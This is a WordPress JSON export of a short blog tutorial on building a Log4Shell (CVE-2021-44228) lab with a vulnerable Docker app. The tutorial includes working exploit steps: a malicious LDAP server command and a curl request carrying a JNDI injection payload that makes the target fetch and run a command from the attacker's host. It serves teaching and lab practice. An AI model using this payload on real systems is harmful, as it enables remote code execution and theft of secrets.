{"id":1217,"date":"2021-12-13T00:19:41","date_gmt":"2021-12-12T16:19:41","guid":{"rendered":"\/?p=1217"},"modified":"2021-12-13T00:19:41","modified_gmt":"2021-12-12T16:19:41","slug":"setting-up-a-log4shell-lab-cve-2021-44228","status":"publish","type":"post","link":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","title":{"rendered":"Setting up a Log4Shell Lab CVE-2021-44228"},"content":{"rendered":"<p>A recently discovered vulnerability in the popular java logging tool Apache Log4j has been made public and the Internet is lit up like the proveriabe Christmas Tree! You can read up on Log4Shell over at <a href=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day\/\" rel=\"noopener\" target=\"_blank\">Lunasec<\/a>. There is also a list on <a href=\"https:\/\/github.com\/YfryTchsGD\/Log4jAttackSurface\" rel=\"noopener\" target=\"_blank\">Github<\/a> showing the vulnerable web applications and vendors. But we&#8217;re here for the lab so lets get to it!<\/p>\n<p>Disclaimer &#8211; as always only do this against a host you have explicit permission to do so with. Like your own lab, silly.<\/p>\n<p><strong>Setup<\/strong><br \/>\n1 x Kali Linux VM, updated etc. Kali VM ip is 10.0.0.1 in this example.<br \/>\nInstall docker<br \/>\nDownload the JINDIExploit<br \/>\n<code>wget https:\/\/github.com\/feihong-cs\/JNDIExploit\/releases\/download\/v1.2\/JNDIExploit.v1.2.zip<br \/>\nunzip JNDIExploit.v1.2.zip<\/code><br \/>\nRun the vulnerable Spring Boot web application:<br \/>\n<code>sudo docker run --name vulnerable-app -p 8080:8080 ghcr.io\/christophetd\/log4shell-vulnerable-app<\/code><\/p>\n<p><strong>Exploit<\/strong><br \/>\n1. Make sure the docker spring boot web application is running.<br \/>\n<code>sudo docker ps <\/code><br \/>\n2. Open a terminal window, setup the JINDIExploit malicous LDAP server:<br \/>\n<code>java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.0.0.1 -p 8888<\/code><br \/>\n2. Open a termminal tab and run the exploit:<br \/>\n<code>curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap:\/\/10.0.0.1:1389\/Basic\/Command\/Base64\/dG91Y2ggL3RtcC9wd25lZAo=}'<\/code><br \/>\nThis will execute touch \/tmp\/pwned on the vulnerable web app.<br \/>\n3. Verify:<br \/>\n<code>$sudo docker exec vulnerable-app ls -la \/tmp<\/code><br \/>\ntotal 20<br \/>\ndrwxrwxrwt    1 root     root          4096 Dec 12 16:08 .<br \/>\ndrwxr-xr-x    1 root     root          4096 Dec 12 15:42 ..<br \/>\ndrwxr-xr-x    2 root     root          4096 Dec 12 15:43 hsperfdata_root<br \/>\n-rw-r&#8211;r&#8211;    1 root     root             0 Dec 12 16:08 <strong>pwned<\/strong><\/p>\n<p>Annnd its done. This exploit is being used in all kinds of creative ways. The above is just a vanilla example. See this twitter <a href=\"https:\/\/twitter.com\/dildog\/status\/1469786190144585729\" rel=\"noopener\" target=\"_blank\">link <\/a>where an attacker can serialise the jindi ldap string for secret environment variables and keys (GCP, AWS etc). I&#8217;ve also seen examples of a reverse shell with netcat.<\/p>\n<p><strong>Mitigate<\/strong><br \/>\nThe <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html#Fixed_in_Log4j_2.15.0\" rel=\"noopener\" target=\"_outside\">patch <\/a>is out for log4j, the issue is so many web apps and vendors have to roll fixes individually.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A recently discovered vulnerability in the popular java logging tool Apache Log4j has been made public and the Internet is lit up like the proveriabe&#8230;<\/p>\n","protected":false},"author":2,"featured_media":1220,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,10],"tags":[],"class_list":["post-1217","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-attack","category-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire<\/title>\n<meta name=\"description\" content=\"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire\" \/>\n<meta property=\"og:description\" content=\"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/\" \/>\n<meta property=\"og:site_name\" content=\"Insecure Wire\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-12T16:19:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"511\" \/>\n\t<meta property=\"og:image:height\" content=\"388\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"nikonau\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/insecurewire\" \/>\n<meta name=\"twitter:site\" content=\"@insecurewire\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nikonau\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/\"},\"author\":{\"name\":\"nikonau\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\"},\"headline\":\"Setting up a Log4Shell Lab CVE-2021-44228\",\"datePublished\":\"2021-12-12T16:19:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/\"},\"wordCount\":258,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg\",\"articleSection\":[\"Attack\",\"Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/\",\"url\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/\",\"name\":\"Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg\",\"datePublished\":\"2021-12-12T16:19:41+00:00\",\"description\":\"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg\",\"width\":511,\"height\":388,\"caption\":\"Log4Shell\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.insecurewi.re\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Setting up a Log4Shell Lab CVE-2021-44228\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.insecurewi.re\/#website\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"name\":\"Insecure Wire\",\"description\":\"A Network Engineer\u2019s Perspective.\",\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.insecurewi.re\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.insecurewi.re\/#organization\",\"name\":\"Insecure Wire\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"width\":32,\"height\":32,\"caption\":\"Insecure Wire\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/insecurewire\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\",\"name\":\"nikonau\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"caption\":\"nikonau\"},\"sameAs\":[\"https:\/\/x.com\/https:\/\/twitter.com\/insecurewire\"],\"url\":\"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire","description":"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","og_locale":"en_US","og_type":"article","og_title":"Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire","og_description":"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.","og_url":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","og_site_name":"Insecure Wire","article_published_time":"2021-12-12T16:19:41+00:00","og_image":[{"width":511,"height":388,"url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","type":"image\/jpeg"}],"author":"nikonau","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/insecurewire","twitter_site":"@insecurewire","twitter_misc":{"Written by":"nikonau","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#article","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/"},"author":{"name":"nikonau","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d"},"headline":"Setting up a Log4Shell Lab CVE-2021-44228","datePublished":"2021-12-12T16:19:41+00:00","mainEntityOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/"},"wordCount":258,"commentCount":0,"publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","articleSection":["Attack","Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","url":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/","name":"Setting up a Log4Shell Lab CVE-2021-44228 - Insecure Wire","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","datePublished":"2021-12-12T16:19:41+00:00","description":"In this post I detail the steps to configure a Log4shell lab and demonstrate the proof of concept exploit.","breadcrumb":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#primaryimage","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/12\/Image-Pasted-at-2021-12-12-11-52.jpg","width":511,"height":388,"caption":"Log4Shell"},{"@type":"BreadcrumbList","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/12\/13\/setting-up-a-log4shell-lab-cve-2021-44228\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.insecurewi.re\/"},{"@type":"ListItem","position":2,"name":"Setting up a Log4Shell Lab CVE-2021-44228"}]},{"@type":"WebSite","@id":"https:\/\/www.insecurewi.re\/#website","url":"https:\/\/www.insecurewi.re\/","name":"Insecure Wire","description":"A Network Engineer\u2019s Perspective.","publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.insecurewi.re\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.insecurewi.re\/#organization","name":"Insecure Wire","url":"https:\/\/www.insecurewi.re\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","width":32,"height":32,"caption":"Insecure Wire"},"image":{"@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/insecurewire"]},{"@type":"Person","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d","name":"nikonau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","caption":"nikonau"},"sameAs":["https:\/\/x.com\/https:\/\/twitter.com\/insecurewire"],"url":"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/"}]}},"_links":{"self":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1217","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/comments?post=1217"}],"version-history":[{"count":0,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1217\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media\/1220"}],"wp:attachment":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media?parent=1217"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/categories?post=1217"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/tags?post=1217"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}